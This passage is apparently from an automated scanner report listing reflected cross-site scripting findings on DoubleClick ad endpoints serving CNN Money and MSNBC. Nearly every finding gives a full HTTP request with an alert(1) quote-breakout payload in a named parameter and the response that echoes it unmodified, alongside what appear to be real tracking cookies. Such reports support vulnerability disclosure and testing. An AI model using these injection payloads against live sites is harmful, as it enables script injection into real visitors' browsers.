http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage¶ms.styles=fs&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909177541&page.allowcompete=yes&domId=632100 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 23 Mar 2011 19:39:57 GMT Vary: Accept-Encoding Expires: Wed, 23 Mar 2011 19:39:57 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7525
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... ar url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad3/f/1df/%2a/k%3B234201955%3B1-0%3B0%3B58104650%3B4307-300/250%3B38756194/38773951/3%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click29d71"-alert(1)-"9f040ad00c0&FlightID=353121&AdID=485242&TargetID=82896&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,3 ...[SNIP]...
The value of the AdID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c930d"-alert(1)-"c22f0226d15 was submitted in the AdID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N815.cnnmoney/B5064924.32;sz=728x90;click=http://ads.cnn.com/event.ng/Type=click&FlightID=362366&AdID=497675c930d"-alert(1)-"c22f0226d15&TargetID=112211&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423,38928,40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=;ord=cktNqWK,bgyutdWclbasd? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz¶ms.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 23 Mar 2011 19:45:19 GMT Expires: Wed, 23 Mar 2011 19:45:19 GMT Vary: Accept-Encoding Cache-Control: private, x-gzip-ok="" Content-Length: 7619
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Tue Mar 08 11:18:0 ...[SNIP]... doubleclick.net/click%3Bh%3Dv8/3ad3/f/1eb/%2a/i%3B233540379%3B4-0%3B0%3B57088445%3B3454-728/90%3B41064361/41082148/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=362366&AdID=497675c930d"-alert(1)-"c22f0226d15&TargetID=112211&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423,38928,40253 ...[SNIP]...
The value of the FlightID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ed7e"-alert(1)-"f599974206b was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N815.cnnmoney/B5064924.32;sz=728x90;click=http://ads.cnn.com/event.ng/Type=click&FlightID=3623661ed7e"-alert(1)-"f599974206b&AdID=497675&TargetID=112211&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423,38928,40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=;ord=cktNqWK,bgyutdWclbasd? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz¶ms.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 23 Mar 2011 19:44:41 GMT Expires: Wed, 23 Mar 2011 19:44:41 GMT Vary: Accept-Encoding Cache-Control: private, x-gzip-ok="" Content-Length: 7633
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Tue Nov 30 09:29:38 ...[SNIP]... ("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad3/f/1eb/%2a/t%3B233540379%3B0-0%3B0%3B57088445%3B3454-728/90%3B39656681/39674468/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=3623661ed7e"-alert(1)-"f599974206b&AdID=497675&TargetID=112211&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423 ...[SNIP]...
The value of the Redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e1db"-alert(1)-"43d125b98c5 was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N815.cnnmoney/B5064924.32;sz=728x90;click=http://ads.cnn.com/event.ng/Type=click&FlightID=362366&AdID=497675&TargetID=112211&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423,38928,40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=2e1db"-alert(1)-"43d125b98c5 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz¶ms.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7714 Cache-Control: no-cache Pragma: no-cache Date: Wed, 23 Mar 2011 19:47:25 GMT Expires: Wed, 23 Mar 2011 19:52:25 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Tue Mar 08 09:18:11 ...[SNIP]... 40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=2e1db"-alert(1)-"43d125b98c5http%3a%2f%2fwww.ibm.com/innovation/us/leadership/response/index.html%3Fcmp%3DUSBRB%26cm%3Db%26csr%3Dagus_itlead-20110307%26cr%3Dcnnmoney%26ct%3DUSBRB301%26cn%3Dcapleadmadrid"); var fscUrl = url; var f ...[SNIP]...
The value of the Segments request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4304a"-alert(1)-"cda7ed7f77b was submitted in the Segments parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N815.cnnmoney/B5064924.32;sz=728x90;click=http://ads.cnn.com/event.ng/Type=click&FlightID=362366&AdID=497675&TargetID=112211&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423,38928,40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,478054304a"-alert(1)-"cda7ed7f77b&Values=1589&Redirect=;ord=cktNqWK,bgyutdWclbasd? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz¶ms.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 23 Mar 2011 19:46:33 GMT Expires: Wed, 23 Mar 2011 19:46:33 GMT Vary: Accept-Encoding Cache-Control: private, x-gzip-ok="" Content-Length: 7736
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Dec 20 16:08:37 ...[SNIP]... 375,35306,38423,38928,40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,478054304a"-alert(1)-"cda7ed7f77b&Values=1589&Redirect=http%3a%2f%2fwww.ibm.com/innovation/us/leadership/hospitals/index.html%3Fcmp%3DUSBRB%26cm%3Db%26csr%3Dagus_itlead-20101213%26cr%3Dcnnmoney%26ct%3DUSBRB301%26cn%3Dcapleadhosp"); va ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb6db"-alert(1)-"ee09ebde4b3 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N815.cnnmoney/B5064924.32;sz=728x90;click=http://ads.cnn.com/event.ng/Type=click&FlightID=362366&AdID=497675&TargetID=112211cb6db"-alert(1)-"ee09ebde4b3&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423,38928,40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=;ord=cktNqWK,bgyutdWclbasd? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz¶ms.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 23 Mar 2011 19:45:59 GMT Expires: Wed, 23 Mar 2011 19:45:59 GMT Vary: Accept-Encoding Cache-Control: private, x-gzip-ok="" Content-Length: 7736
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Dec 20 16:08:37 ...[SNIP]... click%3Bh%3Dv8/3ad3/f/1eb/%2a/n%3B233540379%3B1-0%3B0%3B57088445%3B3454-728/90%3B39920662/39938449/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=362366&AdID=497675&TargetID=112211cb6db"-alert(1)-"ee09ebde4b3&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423,38928,40253,40773,41847,422 ...[SNIP]...
The value of the Values request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8474b"-alert(1)-"44fd70d9e1a was submitted in the Values parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N815.cnnmoney/B5064924.32;sz=728x90;click=http://ads.cnn.com/event.ng/Type=click&FlightID=362366&AdID=497675&TargetID=112211&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423,38928,40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=15898474b"-alert(1)-"44fd70d9e1a&Redirect=;ord=cktNqWK,bgyutdWclbasd? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz¶ms.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 23 Mar 2011 19:46:55 GMT Expires: Wed, 23 Mar 2011 19:46:55 GMT Vary: Accept-Encoding Cache-Control: private, x-gzip-ok="" Content-Length: 7714
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Tue Mar 08 09:18:11 ...[SNIP]... 423,38928,40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=15898474b"-alert(1)-"44fd70d9e1a&Redirect=http%3a%2f%2fwww.ibm.com/innovation/us/leadership/response/index.html%3Fcmp%3DUSBRB%26cm%3Db%26csr%3Dagus_itlead-20110307%26cr%3Dcnnmoney%26ct%3DUSBRB301%26cn%3Dcapleadmadrid"); var fscUrl = ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ed9b"-alert(1)-"f9a28dd4132 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N815.cnnmoney/B5064924.32;sz=728x90;click=http://ads.cnn.com/event.ng/Type=click7ed9b"-alert(1)-"f9a28dd4132&FlightID=362366&AdID=497675&TargetID=112211&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423,38928,40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=;ord=cktNqWK,bgyutdWclbasd? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz¶ms.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 23 Mar 2011 19:44:16 GMT Expires: Wed, 23 Mar 2011 19:44:16 GMT Vary: Accept-Encoding Cache-Control: private, x-gzip-ok="" Content-Length: 7736
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Dec 20 16:08:37 ...[SNIP]... var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad3/f/1eb/%2a/n%3B233540379%3B1-0%3B0%3B57088445%3B3454-728/90%3B39920662/39938449/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click7ed9b"-alert(1)-"f9a28dd4132&FlightID=362366&AdID=497675&TargetID=112211&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,3 ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 465d9'-alert(1)-'6e4ac7352f1 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962465d9'-alert(1)-'6e4ac7352f1&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.msnbc.msn.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Tue, 22 Mar 2011 21:11:39 GMT Vary: Accept-Encoding Expires: Tue, 22 Mar 2011 21:11:39 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5266
document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962465d9'-alert(1)-'6e4ac7352f1&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/ ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f478"-alert(1)-"6eea3e74b0f was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=81349621f478"-alert(1)-"6eea3e74b0f&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.msnbc.msn.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Tue, 22 Mar 2011 21:11:35 GMT Vary: Accept-Encoding Expires: Tue, 22 Mar 2011 21:11:35 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5266
document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne ...[SNIP]... lider_flo_interactive_300x105.gif"; var minV = 6; var FWH = ' width="300" height="105" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=81349621f478"-alert(1)-"6eea3e74b0f&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/ ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 354da'-alert(1)-'5924229b624 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616354da'-alert(1)-'5924229b624&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.msnbc.msn.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Tue, 22 Mar 2011 21:12:05 GMT Vary: Accept-Encoding Expires: Tue, 22 Mar 2011 21:12:05 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5266
